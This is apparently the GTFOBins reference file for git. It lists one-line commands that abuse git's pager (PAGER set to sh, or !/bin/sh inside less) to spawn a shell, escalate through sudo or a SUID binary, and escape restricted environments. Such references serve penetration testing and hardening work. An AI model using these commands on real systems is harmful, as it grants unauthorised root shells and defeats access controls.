GTFOBins.github.io/_gtfobins/git.md
2019-03-31 11:03:34 +01:00

582 B

functions
shell sudo limited-suid
code
PAGER='sh -c "exec sh 0<&1"' git -p help
description code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. git -p help !/bin/sh
code
PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
description code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. sudo git -p help !/bin/sh
code
PAGER='sh -c "exec sh 0<&1"' ./git -p help